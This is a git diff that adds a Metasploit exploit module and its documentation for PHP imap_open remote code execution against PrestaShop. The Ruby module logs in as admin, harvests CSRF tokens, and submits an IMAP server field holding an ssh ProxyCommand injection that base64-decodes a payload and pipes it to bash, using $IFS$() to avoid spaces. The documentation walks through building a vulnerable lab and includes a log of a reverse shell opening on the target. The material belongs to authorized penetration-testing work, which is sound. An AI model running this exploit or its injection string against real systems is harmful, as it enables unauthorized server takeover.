diff --git a/documentation/modules/exploit/linux/http/php_imap_open_rce.md b/documentation/modules/exploit/linux/http/php_imap_open_rce.md
new file mode 100644
index 0000000000..d41accf72c
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/php_imap_open_rce.md
@@ -0,0 +1,156 @@
+## Vulnerable Application
+
+  The [imap_open](http://php.net/manual/en/function.imap-open.php) function within php,
+  if called without the `/norsh` flag, will attempt to preauthenticate an IMAP session.
+  On Debian based systems, including Ubuntu, `rsh` is mapped to the ssh binary. Ssh's 
+  `ProxyCommand` option can be passed from `imap_open` to execute arbitrary commands.
+  While many custom applications may use `imap_open`, it is reported that the following
+  applications are vulnerable: 
+
+* instantcms
+* HostCMS
+* e107_2
+* prestashop
+* SuiteCRM
+* SugarCRM
+
+  Prestashop exploitation requires the admin URI, and administrator credentials.
+
+### Prestashop on Ubuntu 16.04
+
+Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-prestashop-on-ubuntu-17-04-17-10-with-apache2-mariadb-and-php/),
+with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod.
+
+```
+sudo apt install apache2
+sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
+sudo systemctl stop apache2.service
+sudo systemctl start apache2.service
+sudo systemctl enable apache2.service
+sudo apt-get install mariadb-server mariadb-client
+sudo systemctl stop mysql.service
+sudo systemctl start mysql.service
+sudo systemctl enable mysql.service
+sudo mysql_secure_installation
+sudo systemctl restart mysql.service
+sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
+sudo phpenmod imap
+sudo mysql -u root -p
+```
+
+```
+CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
+GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION;
+FLUSH PRIVILEGES;
+EXIT;
+```
+
+```
+cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
+unzip prestashop_1.7.2.4.zip
+sudo mkdir -p /var/www/html/prestashop
+sudo unzip prestashop.zip -d /var/www/html/prestashop/
+sudo chown -R www-data:www-data /var/www/html/prestashop/
+sudo chmod -R 755 /var/www/html/prestashop/
+sudo nano /etc/apache2/sites-available/prestashop.conf
+```
+
+Utilize the following configuration:
+```
+<VirtualHost *:80>
+     ServerAdmin admin@example.com
+     DocumentRoot /var/www/html/prestashop/
+     ServerName example.com
+     ServerAlias www.example.com
+
+     <Directory /var/www/html/prestashop/>
+        Options +FollowSymlinks
+        AllowOverride All
+        Require all granted
+     </Directory>
+
+     ErrorLog ${APACHE_LOG_DIR}/error.log
+     CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+</VirtualHost>
+```
+
+```
+sudo a2ensite prestashop.conf
+sudo a2enmod rewrite
+sudo a2dissite 000-default
+sudo systemctl restart apache2.service
+```
+
+Browse to the website, and install with default information.
+
+```
+sudo rm -rf /var/www/html/prestashop/install/
+```
+
+Now browse to `/admin`, and the first time you'll be redirected to the admin URI.  If not, `sudo ls /var/www/html/prestashop/admin*`.
+
+## Verification Steps
+
+  1. Install a vulnerable application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/php_imap_open_rce```
+  4. Do: ```set TARGETURI [URI]```
+  5. Do: ```set USERNAME [username]```
+  6. Do: ```set PASSWORD [password]```
+  7. Do: ```set target [target]```
+  8. Do: ```run```
+  9. You should get a shell.
+
+## Options
+
+  **TARGETURI**
+
+  The URI for the target.  This may change by target.  Default is ``.
+  Prestashop should be the admin URI, similar to `/admin2769gx8k3`.
+
+## Scenarios
+
+### PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0
+
+  ```
+  resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
+  resource (presta.rb)> set TARGETURI /admin2769gx8k3
+  TARGETURI => /admin2769gx8k3
+  resource (presta.rb)> set USERNAME ubuntu@none.com
+  USERNAME => ubuntu@none.com
+  resource (presta.rb)> set PASSWORD ubuntuubuntu
+  PASSWORD => ubuntuubuntu
+  resource (presta.rb)> set rhosts 192.168.2.139
+  rhosts => 192.168.2.139
+  resource (presta.rb)> set verbose true
+  verbose => true
+  resource (presta.rb)> exploit
+  [*] Started reverse TCP double handler on 192.168.2.117:4444 
+  [*] Redirected to http://192.168.2.139/admin2769gx8k3/
+  [*] Redirected to http://192.168.2.139/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
+  [*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://192.168.2.139/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
+  [*] Logging in with ubuntu@none.com:ubuntuubuntu
+  [*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/192.168.2.139\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
+  [+] Login Success, loading admin dashboard to pull tokens
+  [*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
+  [+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
+  [*] Accepted the first client connection...
+  [*] Accepted the second client connection...
+  [*] Command: echo ivxULEW4eweTiis7;
+  [*] Writing to socket A
+  [*] Writing to socket B
+  [*] Reading from sockets...
+  [*] Reading from socket A
+  [*] A: "ivxULEW4eweTiis7\r\n"
+  [*] Matching...
+  [*] B is input...
+  [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.139:41746) at 2018-11-18 21:08:50 -0500
+  
+  uname -a
+  Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+  whoami
+  www-data
+  id
+  uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  ```
diff --git a/modules/exploits/linux/http/php_imap_open_rce.rb b/modules/exploits/linux/http/php_imap_open_rce.rb
new file mode 100644
index 0000000000..f2962c61b4
--- /dev/null
+++ b/modules/exploits/linux/http/php_imap_open_rce.rb
@@ -0,0 +1,175 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'php imap_open Remote Code Execution',
+      'Description'     => %q{
+        The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an
+        IMAP session.  On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary.  Ssh's ProxyCommand
+        option can be passed from imap_open to execute arbitrary commands.
+        While many custom applications may use imap_open, it is reported that the following applications are vulnerable:
+        instantcms, HostCMS, e107_2, prestashop, SuiteCRM, SugarCRM.
+        Prestashop exploitation requires the admin URI, and administrator credentials.
+      },
+      'Author' =>
+        [
+          'Twoster', # Vulnerability discovery and PoC
+          'h00die' # Metasploit Module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],
+          [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ]
+        ],
+      'Privileged'  => false,
+      'Platform'  => [ 'unix' ],
+      'Arch'  => ARCH_CMD,
+      'Targets' =>
+        [
+          [ 'prestashop', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 19 2018'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base directory path", '/admin2769gx8k3']),
+        OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
+      ])
+  end
+
+  def check
+   if target.name =~ /prestashop/
+      uri = normalize_uri(target_uri.path)
+      res = send_request_cgi({'uri' => uri})
+      if res && (res.code == 301 || res.code == 302)
+       return CheckCode::Detected
+      end
+   end
+   CheckCode::Safe
+  end
+
+  def command
+    #payload is base64 encoded, and stuffed into the SSH option.
+    enc_payload = Rex::Text.encode_base64(payload.encoded)
+    command = "-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`"
+    #final payload can not contain spaces, however $IFS$() will return the space we require
+    command.gsub!(' ', '$IFS$()')
+  end
+
+  def exploit
+    if target.name =~ /prestashop/
+      uri = normalize_uri(target_uri.path)
+      res = send_request_cgi({'uri' => uri})
+      if res && res.code != 301
+        print_error('Admin redirect not found, check URI.  Should be something similar to /admin2769gx8k3')
+        return
+      end
+
+      #There are a bunch of redirects that happen, so we automate going through them to get to the login page.
+      while res.code == 301 || res.code == 302
+        cookie = res.get_cookies
+        uri = res.headers['Location']
+        vprint_status("Redirected to #{uri}")
+        res = send_request_cgi({'uri' => uri})
+      end
+
+      #Tokens are generated for each URL or sub-component, we need valid ones!
+      /.*token=(?<token>\w{32})/ =~ uri
+      /id="redirect" value="(?<redirect>.*)"\/>/ =~ res.body
+      cookie = res.get_cookies
+      vprint_status("Token: #{token} and Login Redirect: #{redirect}")
+      print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path) + '/index.php',
+        'cookie' => cookie,
+        'vars_post' => {
+          'ajax' => 1,
+          'token' => '',
+          'controller' => 'AdminLogin',
+          'submitLogin' => '1',
+          'passwd' => datastore['PASSWORD'],
+          'email' => datastore['USERNAME'],
+          'redirect' => redirect
+        },
+        'vars_get' => {
+          'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated
+        }
+      )
+      if res && res.body.include?('Invalid password')
+        print_error('Invalid Login')
+        return
+      end
+      vprint_status("Login JSON Response: #{res.body}")
+      uri = JSON.parse(res.body)['redirect']
+      cookie = res.get_cookies
+      print_good('Login Success, loading admin dashboard to pull tokens')
+      res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
+      #print_status(res.code.to_s)
+      #if res.code == 301 || res.code == 302
+      #  print_status("#{res.code} -> #{res.headers['Location']}")
+      #  cookie = res.get_cookies
+      #  uri = res.headers['Location']
+      #  res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
+      #end
+
+      /AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
+      vprint_status("Customer Threads Token: #{token}")
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path) + '/index.php',
+        'cookie' => cookie,
+        'vars_get' => {
+          'controller' => 'AdminCustomerThreads',
+          'token' => token
+        }
+      })
+
+      /form method="post" action="index\.php\?controller=AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
+      print_good("Sending Payload with Final Token: #{token}")
+      data = Rex::MIME::Message.new
+      data.add_part('1', nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_FILE_UPLOAD"')
+      data.add_part("Dear Customer,\n\nRegards,\nCustomer service", nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_SIGNATURE_1"')
+      data.add_part("x #{command}}", nil, nil, 'form-data; name="PS_SAV_IMAP_URL"')
+      data.add_part('143', nil, nil, 'form-data; name="PS_SAV_IMAP_PORT"')
+      data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_USER"')
+      data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_PWD"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_DELETE_MSG"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_CREATE_THREADS"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_POP3"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NORSH"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_SSL"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_VALIDATE-CERT"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOVALIDATE-CERT"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_TLS"')
+      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOTLS"')
+      data.add_part('', nil, nil, 'form-data; name="submitOptionscustomer_thread"')
+
+      send_request_cgi(
+        'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path) + '/index.php',
+        'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+        'data'   => data.to_s,
+        'cookie' => cookie,
+        'vars_get' => {
+          'controller' => 'AdminCustomerThreads',
+          'token' => token
+        }
+      )
+
+      if res && res.body.include?('imap Is Not Installed On This Server')
+        print_error('PHP IMAP mod not installed/enabled ')
+      end
+    end
+  end
+end